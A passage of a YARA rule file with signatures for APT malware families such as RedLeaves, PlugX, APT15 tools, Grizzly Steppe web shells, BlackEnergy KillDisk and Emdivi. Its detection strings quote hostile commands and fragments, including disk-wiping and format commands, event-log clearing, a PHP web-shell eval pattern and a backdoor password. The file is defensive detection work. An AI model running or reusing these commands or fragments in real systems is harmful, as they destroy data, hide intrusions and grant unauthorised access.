    $XOR_Loop = { 32 0C 3A 83 C2 02 88 0E 83 FA 08 [4-14] 32 0C 3A 83 C2 02 88 0E 83 FA 10 }
  condition:
    any of them
}

rule REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief {
  meta:
    description = "Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT"
    author = "USG"
    true_positive = "fb0c714cd2ebdcc6f33817abe7813c36"
    reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
  strings:
    $RedleavesStringObfu = { 73 64 65 5E 60 74 75 74 6C 6F 60 6D 5E 6D 64 60 77 64 72 5E 65 6D 6D 6C 60 68 6F 2F 65 6D 6D }
  condition:
    any of them
}

rule REDLEAVES_CoreImplant_UniqueStrings {
  meta:
    description = "Strings identifying the core REDLEAVES RAT in its deobfuscated state"
    author = "USG"
    reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
  strings:
    $unique2 = "RedLeavesSCMDSimulatorMutex" ascii wide nocase
    $unique4 = "red_autumnal_leaves_dllmain.dll" ascii wide
    $unique7 = "\\NamePipe_MoreWindows" ascii wide
  condition:
    any of them
}

rule PLUGX_RedLeaves {
  meta:
    author = "US-CERT Code Analysis Team"
    date = "03042017"
    incident = "10118538"
    date = "2017/04/03"
    MD5_1 = "598FF82EA4FB52717ACAFB227C83D474"
    MD5_2 = "7D10708A518B26CC8C3CBFBAA224E032"
    MD5_3 = "AF406D35C77B1E0DF17F839E36BCE630"
    MD5_4 = "6EB9E889B091A5647F6095DCD4DE7C83"
    MD5_5 = "566291B277534B63EAFC938CDAAB8A399E41AF7D"
    info = "Detects specific RedLeaves and PlugX binaries"
    reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
  strings:
    $s0 = { 80 34 30 57 40 3D 2F D0 01 00 72 F4 33 C0 8B FF 80 34 30 24 40 3D 2F D0 01 00 72 F4 }
    $s1 = "C:/Users/user/Desktop/my_OK_2014/bit9/runsna/Release/runsna.pdb" ascii fullword
    $s2 = "d:/work/plug4.0(shellcode)" ascii fullword
    $s3 = "/shellcode/shellcode/XSetting.h" ascii fullword
    $s4 = { 42 AF F4 27 6A 45 AA 58 47 4D 4C 4B E0 3D 5B 39 55 66 BE BC BD ED E9 97 28 72 C5 C4 C5 49 82 28 }
    $s5 = { 8A D3 2A D0 02 D1 80 C2 38 30 14 0E 41 3B CB 7C EF 6A 00 6A 00 6A 00 56 6A 00 6A 00 }
    $s6 = { EB 05 5F 8B C7 EB 05 E8 F6 FF FF FF 55 8B EC 81 EC C8 04 00 00 53 56 57 }
    $s7 = { 8A 04 32 33 C9 32 04 39 83 C1 02 88 04 32 83 F9 0A 7C F2 42 89 0D 18 AA 00 10 3B D3 7C E2 89 15 14 AA 00 10 6A 00 6A 00 6A 00 56 }
    $s8 = { 29 35 37 67 5A 40 2A 33 35 57 B0 5E 04 D0 9C B0 5E B3 AD A4 A4 A4 0E D0 B7 DA B7 93 5F 5B 5B 08 }
    $s9 = "RedLeavesCMDSimulatorMutex"
  condition:
    $s0 or $s1 or $s2 and $s3 or $s4 or $s5 or $s6 or $s7 or $s8 or $s9
}

rule Ham_backdoor {
  meta:
    author = "Cylance Spear Team"
    reference = "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html"
  strings:
    $a = { 8D 14 3E 8B 7D FC 8A 0C 11 32 0C 38 40 8B 7D 10 88 0A 8B 4D 08 3B C3 }
    $b = { 8D 0C 1F 8B 5D F8 8A 04 08 32 04 1E 46 8B 5D 10 88 01 8B 45 08 3B F2 }
  condition:
    $a or $b
}

rule Tofu_Backdoor {
  meta:
    author = "Cylance Spear Team"
    reference = "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html"
  strings:
    $a = "Cookies: Sym1.0"
    $b = "\\\\.\\pipe\\1[12345678]"
    $c = { 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0 }
  condition:
    $a or $b or $c
}

rule clean_apt15_patchedcmd {
  meta:
    author = "Ahmed Zaki"
    description = "This is a patched CMD. This is the CMD that RoyalCli uses."
    reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
    sha256 = "90d1f65cfa51da07e040e066d4409dc8a48c1ab451542c894a623bc75c14bf8f"
  strings:
    $ = "eisableCMD" wide
    $ = "%WINDOWS_COPYRIGHT%" wide
    $ = "Cmd.Exe" wide
    $ = "Windows Command Processor" wide
  condition:
    all of them
}

rule malware_apt15_royalcli_1 {
  meta:
    description = "Generic strings found in the Royal CLI tool"
    reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
    author = "David Cannings"
    sha256 = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
  strings:
    $ = "%s~clitemp%08x.tmp" fullword
    $ = "qg.tmp" fullword
    $ = "%s /c %s>%s" fullword
    $ = "hkcmd.exe" fullword
    $ = "%snewcmd.exe" fullword
    $ = "%shkcmd.exe" fullword
    $ = "%s~clitemp%08x.ini" fullword
    $ = "myRObject" fullword
    $ = "myWObject" fullword
    $ = "10 %d %x\x0D\x0A"
    $ = "4 %s  %d\x0D\x0A"
    $ = "6 %s  %d\x0D\x0A"
    $ = "1 %s  %d\x0D\x0A"
    $ = "3 %s  %d\x0D\x0A"
    $ = "5 %s  %d\x0D\x0A"
    $ = "2 %s  %d 0 %d\x0D\x0A"
    $ = "2 %s  %d 1 %d\x0D\x0A"
    $ = "%s file not exist" fullword
  condition:
    5 of them
}

rule malware_apt15_royalcli_2 {
  meta:
    author = "Nikolaos Pantazopoulos"
    description = "APT15 RoyalCli backdoor"
    reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
  strings:
    $string1 = "%shkcmd.exe" fullword
    $string2 = "myRObject" fullword
    $string3 = "%snewcmd.exe" fullword
    $string4 = "%s~clitemp%08x.tmp" fullword
    $string5 = "hkcmd.exe" fullword
    $string6 = "myWObject" fullword
  condition:
    uint16(0) == 23117 and 2 of them
}

rule malware_apt15_bs2005 {
  meta:
    author = "Ahmed Zaki"
    md5 = "ed21ce2beee56f0a0b1c5a62a80c128b"
    description = "APT15 bs2005"
    reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
  strings:
    $ = "%s&%s&%s&%s" ascii wide
    $ = "%s\\%s" ascii wide
    $ = "WarOnPostRedirect" ascii wide fullword
    $ = "WarnonZoneCrossing" ascii wide fullword
    $ = "^^^^^" ascii wide fullword
    $ = /"?%s\s*"?\s*\/C\s*"?%s\s*>\s*\\?"?%s\\(\w+\.\w+)?"\s*2>&1\s*"?/
    $ = "IEharden" ascii wide fullword
    $ = "DEPOff" ascii wide fullword
    $ = "ShownVerifyBalloon" ascii wide fullword
    $ = "IEHardenIENoWarn" ascii wide fullword
  condition:
    (uint16(0) == 23117 and 5 of them) or (uint16(0) == 23117 and 3 of them and (pe.imports("advapi32.dll", "CryptDecrypt") and pe.imports("advapi32.dll", "CryptEncrypt") and pe.imports("ole32.dll", "CoCreateInstance")))
}

rule malware_apt15_royaldll {
  meta:
    author = "David Cannings"
    description = "DLL implant, originally rights.dll and runs as a service"
    reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
    sha256 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
  strings:
    $opcodes_jshash = { B8 A7 C6 67 4E 83 C1 02 BA 04 00 00 00 57 90 }
    $opcodes_encode = { 0F B6 1C 03 8B 55 08 30 1C 17 47 3B 7D 0C }
    $opcodes_sleep_loop = { 68 ( 88 | B8 ) ( 13 | 0B ) 00 00 FF D6 4F 75 F6 }
    $ = "Nwsapagent" fullword
    $ = "\"%s\">>\"%s\"\\s.txt"
    $ = "myWObject" fullword
    $ = "del c:\\windows\\temp\\r.exe /f /q"
    $ = "del c:\\windows\\temp\\r.ini /f /q"
  condition:
    3 of them
}

rule malware_apt15_royaldll_2 {
  meta:
    author = "Ahmed Zaki"
    sha256 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
    description = "DNS backdoor used by APT15"
    reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
  strings:
    $ = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" ascii wide
    $ = "netsvcs" ascii wide fullword
    $ = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" ascii wide fullword
    $ = "SYSTEM\\CurrentControlSet\\Services\\" ascii wide
    $ = "myWObject" ascii wide
  condition:
    uint16(0) == 23117 and all of them and pe.exports("ServiceMain") and filesize > 51200 and filesize < 614400
}

rule malware_apt15_exchange_tool {
  meta:
    author = "Ahmed Zaki"
    md5 = "d21a7e349e796064ce10f2f6ede31c71"
    description = "This is a an exchange enumeration/hijacking tool used by an APT 15"
    reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
  strings:
    $s1 = "subjectname" fullword
    $s2 = "sendername" fullword
    $s3 = "WebCredentials" fullword
    $s4 = "ExchangeVersion" fullword
    $s5 = "ExchangeCredentials" fullword
    $s6 = "slfilename" fullword
    $s7 = "EnumMail" fullword
    $s8 = "EnumFolder" fullword
    $s9 = "set_Credentials" fullword
    $s10 = "/de" wide
    $s11 = "/sn" wide
    $s12 = "/sbn" wide
    $s13 = "/list" wide
    $s14 = "/enum" wide
    $s15 = "/save" wide
    $s16 = "/ao" wide
    $s17 = "/sl" wide
    $s18 = "/v or /t is null" wide
    $s19 = "2007" wide
    $s20 = "2010" wide
    $s21 = "2010sp1" wide
    $s22 = "2010sp2" wide
    $s23 = "2013" wide
    $s24 = "2013sp1" wide
  condition:
    uint16(0) == 23117 and 15 of ($s*)
}

rule malware_apt15_generic {
  meta:
    author = "David Cannings"
    description = "Find generic data potentially relating to AP15 tools"
    reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
  strings:
    $str01 = "myWObject" fullword
    $str02 = "myRObject" fullword
    $opcodes01 = { 6A ( 02 | 03 ) 6A 00 6A 00 68 00 00 00 C0 50 FF 15 }
  condition:
    2 of them
}

rule APT17_Sample_FXSST_DLL {
  meta:
    description = "Detects Samples related to APT17 activity - file FXSST.DLL"
    author = "Florian Roth"
    reference = "https://goo.gl/ZiJyQv"
    date = "2015-05-14"
    hash = "52f1add5ad28dc30f68afda5d41b354533d8bce3"
  strings:
    $x1 = "Microsoft? Windows? Operating System" wide fullword
    $x2 = "fxsst.dll" ascii fullword
    $y1 = "DllRegisterServer" ascii fullword
    $y2 = ".cSV" ascii fullword
    $s1 = "GetLastActivePopup"
    $s2 = "Sleep"
    $s3 = "GetModuleFileName"
    $s4 = "VirtualProtect"
    $s5 = "HeapAlloc"
    $s6 = "GetProcessHeap"
    $s7 = "GetCommandLine"
  condition:
    uint16(0) == 23117 and filesize < 819200 and (1 of ($x*) or all of ($y*)) and all of ($s*)
}

rule GRIZZLY_STEPPE_Malware_1 {
  meta:
    description = "Auto-generated rule - file HRDG022184_certclint.dll"
    author = "Florian Roth"
    reference = "https://goo.gl/WVflzO"
    date = "2016-12-29"
    hash1 = "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5"
  strings:
    $s1 = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" ascii fullword
    $s2 = "Repeat last find command)Replace specific text with different text" wide fullword
    $s3 = "l\\Processor(0)\\% Processor Time" wide fullword
    $s6 = "Self Process" wide fullword
    $s7 = "Default Process" wide fullword
    $s8 = "Star Polk.exe" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and 4 of them)
}

rule GRIZZLY_STEPPE_Malware_2 {
  meta:
    description = "Auto-generated rule - file 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
    author = "Florian Roth"
    reference = "https://goo.gl/WVflzO"
    date = "2016-12-29"
    hash1 = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
    hash2 = "55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641"
  strings:
    $x1 = "GoogleCrashReport.dll" ascii fullword
    $s1 = "CrashErrors" ascii fullword
    $s2 = "CrashSend" ascii fullword
    $s3 = "CrashAddData" ascii fullword
    $s4 = "CrashCleanup" ascii fullword
    $s5 = "CrashInit" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and $x1) or (all of them)
}

rule PAS_TOOL_PHP_WEB_KIT_mod {
  meta:
    description = "Detects PAS Tool PHP Web Kit"
    reference = "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity"
    author = "US CERT - modified by Florian Roth due to performance reasons"
    date = "2016/12/29"
  strings:
    $php = "<?php"
    $base64decode1 = "='base'.("
    $strreplace = "str_replace(\"\\n\", ''"
    $md5 = ".substr(md5(strrev("
    $gzinflate = "gzinflate"
    $cookie = "_COOKIE"
    $isset = "isset"
  condition:
    $php at 0 and (filesize > 10240 and filesize < 30720) and #cookie == 2 and #isset == 3 and all of them
}

rule WebShell_PHP_Web_Kit_v3 {
  meta:
    description = "Detects PAS Tool PHP Web Kit"
    reference = "https://github.com/wordfence/grizzly"
    author = "Florian Roth"
    date = "2016/01/01"
  strings:
    $php = "<?php $"
    $php2 = "@assert(base64_decode($_REQUEST["
    $s1 = "(str_replace(\"\\n\", '', '"
    $s2 = "(strrev($" ascii
    $s3 = "de'.'code';" ascii
  condition:
    ($php at 0 or $php2) and filesize > 8192 and filesize < 102400 and all of ($s*)
}

rule WebShell_PHP_Web_Kit_v4 {
  meta:
    description = "Detects PAS Tool PHP Web Kit"
    reference = "https://github.com/wordfence/grizzly"
    author = "Florian Roth"
    date = "2016/01/01"
  strings:
    $php = "<?php $"
    $s1 = "(StR_ReplAcE(\"\\n\",'',"
    $s2 = ";if(PHP_VERSION<'5'){" ascii
    $s3 = "=SuBstr_rePlACe(" ascii
  condition:
    $php at 0 and filesize > 8192 and filesize < 102400 and 2 of ($s*)
}

rule APT3102Code {
  meta:
    description = "3102 code features"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    $setupthread = { B9 02 07 00 00 BE ?? ?? ?? ?? 8B F8 6A 00 F3 A5 }
  condition:
    any of them
}

rule APT3102Strings {
  meta:
    description = "3102 Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    $ = "rundll32_exec.dll\x00Update"
  condition:
    any of them
}

rule APT9002Code {
  meta:
    description = "9002 code features"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    $ = { B9 7A 21 00 00 BE ?? ?? ?? ?? 8B F8 ?? ?? ?? F3 A5 }
    $ = { 8A 14 3E 8A 1C 01 32 DA 88 1C 01 8B 54 3E 04 40 3B C2 72 EC }
  condition:
    any of them
}

rule APT9002Strings {
  meta:
    description = "9002 Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    $ = "POST http://%ls:%d/%x HTTP/1.1"
    $ = "%%TEMP%%\\%s_p.ax" ascii wide
    $ = "%TEMP%\\uid.ax" ascii wide
    $ = "%%TEMP%%\\%s.ax" ascii wide
    $ = "sysinfo\x00sysbin01"
    $ = "\\FlashUpdate.exe"
  condition:
    any of them
}

rule APT9002 {
  meta:
    description = "9002"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  condition:
    APT9002Code or APT9002Strings
}

rule FE_APT_9002 {
  meta:
    Author = "FireEye Labs"
    Date = "2013/11/10"
    Description = "Strings inside"
    Reference = "Useful link"
  strings:
    $mz = { 4D 5A }
    $a = "rat_UnInstall" ascii wide
  condition:
    ($mz at 0) and $a
}

rule apt_backspace {
  meta:
    description = "Detects APT backspace"
    author = "Bit Byte Bitten"
    date = "2015-05-14"
    hash = "6cbfeb7526de65eb2e3c848acac05da1e885636d17c1c45c62ad37e44cd84f99"
  strings:
    $s1 = "!! Use Splice Socket !!"
    $s2 = "User-Agent: SJZJ (compatible; MSIE 6.0; Win32)"
    $s3 = "g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d"
  condition:
    uint16(0) == 23117 and all of them
}

rule APT_bestia {
  meta:
    author = "Adam Ziaja <adam@adamziaja.com> http://adamziaja.com"
    date = "2014-03-19"
    description = "Bestia.3.02.012.07 malware used in APT attacks on Polish government"
    references = "http://zaufanatrzeciastrona.pl/post/ukierunkowany-atak-na-pracownikow-polskich-samorzadow/"
    hash0 = "9bb03bb5af40d1202378f95a6485fba8"
    hash1 = "7d9a806e0da0b869b10870dd6c7692c5"
    maltype = "apt"
    filetype = "exe"
  strings:
    $string0 = "u4(UeK"
    $string1 = "nMiq/'p"
    $string2 = "_9pJMf"
    $string3 = "ICMP.DLL"
    $string4 = "EG}QAp"
    $string5 = "tsjWj:U"
    $string6 = "FileVersion" wide
    $string7 = "O2nQpp"
    $string8 = "2}W8we"
    $string9 = "ILqkC:l"
    $string10 = "f1yzMk"
    $string11 = "AutoIt v3 Script: 3, 3, 8, 1" wide
    $string12 = "wj<1uH"
    $string13 = "6fL-uD"
    $string14 = "B9Iavo<"
    $string15 = "rUS)sO"
    $string16 = "FJH{_/f"
    $string17 = "3e 03V"
  condition:
    17 of them
}

rule BlackEnergy_BE_2 {
  meta:
    description = "Detects BlackEnergy 2 Malware"
    author = "Florian Roth"
    reference = "http://goo.gl/DThzLz"
    date = "2015/02/19"
    hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
  strings:
    $s0 = "<description> Windows system utility service  </description>" ascii fullword
    $s1 = "WindowsSysUtility - Unicode" wide fullword
    $s2 = "msiexec.exe" wide fullword
    $s3 = "WinHelpW" ascii fullword
    $s4 = "ReadProcessMemory" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 256000 and all of ($s*)
}

rule BlackEnergy_VBS_Agent {
  meta:
    description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs"
    author = "Florian Roth"
    reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
    date = "2016-01-03"
    hash = "b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f"
  strings:
    $s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" ascii fullword
    $s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" ascii fullword
    $s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" ascii fullword
  condition:
    filesize < 1024 and 2 of them
}

rule DropBear_SSH_Server {
  meta:
    description = "Detects DropBear SSH Server (not a threat but used to maintain access)"
    author = "Florian Roth"
    reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
    date = "2016-01-03"
    score = 50
    hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
  strings:
    $s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" ascii fullword
    $s2 = "Badly formatted command= authorized_keys option" ascii fullword
    $s3 = "This Dropbear program does not support '%s' %s algorithm" ascii fullword
    $s4 = "/etc/dropbear/dropbear_dss_host_key" ascii fullword
    $s5 = "/etc/dropbear/dropbear_rsa_host_key" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and 2 of them
}

rule BlackEnergy_BackdoorPass_DropBear_SSH {
  meta:
    description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy"
    author = "Florian Roth"
    reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
    date = "2016-01-03"
    hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
  strings:
    $s1 = "passDs5Bu9Te7" ascii fullword
  condition:
    uint16(0) == 23117 and $s1
}

rule BlackEnergy_KillDisk_1 {
  meta:
    description = "Detects KillDisk malware from BlackEnergy"
    author = "Florian Roth"
    reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
    date = "2016-01-03"
    score = 80
    super_rule = 1
    hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
    hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
    hash3 = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d"
    hash4 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
  strings:
    $s0 = "system32\\cmd.exe" ascii fullword
    $s1 = "system32\\icacls.exe" wide fullword
    $s2 = "/c del /F /S /Q %c:\\*.*" ascii fullword
    $s3 = "shutdown /r /t %d" ascii fullword
    $s4 = "/C /Q /grant " wide fullword
    $s5 = "%08X.tmp" ascii fullword
    $s6 = "/c format %c: /Y /X /FS:NTFS" ascii fullword
    $s7 = "/c format %c: /Y /Q" ascii fullword
    $s8 = "taskhost.exe" wide fullword
    $s9 = "shutdown.exe" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and 8 of them
}

rule BlackEnergy_KillDisk_2 {
  meta:
    description = "Detects KillDisk malware from BlackEnergy"
    author = "Florian Roth"
    reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
    date = "2016-01-03"
    score = 80
    super_rule = 1
    hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
    hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
    hash3 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
  strings:
    $s0 = "%c:\\~tmp%08X.tmp" ascii fullword
    $s1 = "%s%08X.tmp" ascii fullword
    $s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide fullword
    $s3 = "%ls_%ls_%ls_%d.~tmp" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and 3 of them
}

rule BlackEnergy_Driver_USBMDM {
  meta:
    description = "Auto-generated rule - from files 7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094, b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a, edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
    author = "Florian Roth"
    reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
    date = "2016-01-04"
    super_rule = 1
    hash1 = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094"
    hash2 = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a"
    hash3 = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
    hash4 = "ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc"
    hash5 = "7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291"
    hash6 = "405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5"
    hash7 = "244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5"
    hash8 = "edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf"
  strings:
    $s1 = "USB MDM Driver" wide fullword
    $s2 = "KdDebuggerNotPresent" ascii fullword
    $s3 = "KdDebuggerEnabled" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 184320 and all of them
}

rule BlackEnergy_Driver_AMDIDE {
  meta:
    description = "Auto-generated rule - from files 32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614, 3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2, 90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c, 97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
    author = "Florian Roth"
    reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
    date = "2016-01-04"
    super_rule = 1
    hash1 = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614"
    hash2 = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2"
    hash3 = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c"
    hash4 = "97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
    hash5 = "5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc"
    hash6 = "cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988"
    hash7 = "1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68"
  strings:
    $s1 = " AMD IDE driver" wide fullword
    $s2 = "SessionEnv" wide fullword
    $s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide
    $s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide
  condition:
    uint16(0) == 23117 and filesize < 153600 and all of them
}

rule Emdivi_SFX {
  meta:
    description = "Detects Emdivi malware in SFX Archive"
    author = "Florian Roth @Cyber0ps"
    reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
    date = "2015-08-20"
    score = 70
    hash1 = "7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196"
    hash2 = "8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b"
  strings:
    $x1 = "Setup=unsecess.exe" ascii fullword
    $x2 = "Setup=leassnp.exe" ascii fullword
    $s1 = "&Enter password for the encrypted file:" wide fullword
    $s2 = ";The comment below contains SFX script commands" ascii fullword
    $s3 = "Path=%temp%" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 757760 and (1 of ($x*) and all of ($s*))
}

rule Emdivi_Gen1 {
  meta:
    description = "Detects Emdivi Malware"
    author = "Florian Roth @Cyber0ps"
    reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
    date = "2015-08-20"
    score = 80
    super_rule = 1
    hash1 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
    hash2 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
    hash3 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
    hash4 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
  strings:
    $x1 = "wmic nteventlog where filename=\"SecEvent\" call cleareventlog" wide fullword
    $s0 = "del %Temp%\\*.exe %Temp%\\*.dll %Temp%\\*.bat %Temp%\\*.ps1 %Temp%\\*.cmd /f /q" wide fullword
    $x3 = "userControl-v80.exe" ascii fullword
    $s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" wide fullword
    $s2 = "http://www.msftncsi.com" wide fullword
    $s3 = "net use | find /i \"c$\"" wide fullword
    $s4 = " /del /y & " wide fullword
    $s5 = "\\auto.cfg" wide fullword
    $s6 = "/ncsi.txt" wide fullword
    $s7 = "Dcmd /c" wide fullword
    $s8 = "/PROXY" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 819200 and all of them
}

rule Emdivi_Gen2 {
  meta:
    description = "Detects Emdivi Malware"
    author = "Florian Roth @Cyber0ps"
    reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
    date = "2015-08-20"
    super_rule = 1
    score = 80
    hash1 = "9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1"
    hash2 = "a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012"
    hash3 = "9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4"
  strings:
    $s1 = "%TEMP%\\IELogs\\" ascii fullword
    $s2 = "MSPUB.EXE" ascii fullword
    $s3 = "%temp%\\" ascii fullword
    $s4 = "\\NOTEPAD.EXE" ascii fullword
    $s5 = "%4d-%02d-%02d %02d:%02d:%02d " ascii fullword
    $s6 = "INTERNET_OPEN_TYPE_PRECONFIG" ascii fullword
    $s7 = "%4d%02d%02d%02d%02d%02d" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1331200 and 6 of them
}

rule Emdivi_Gen3 {
  meta:
    description = "Detects Emdivi Malware"
    author = "Florian Roth @Cyber0ps"
    reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
    date = "2015-08-20"
    super_rule = 1
    score = 80
    hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
    hash2 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
  strings:
    $x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" ascii fullword
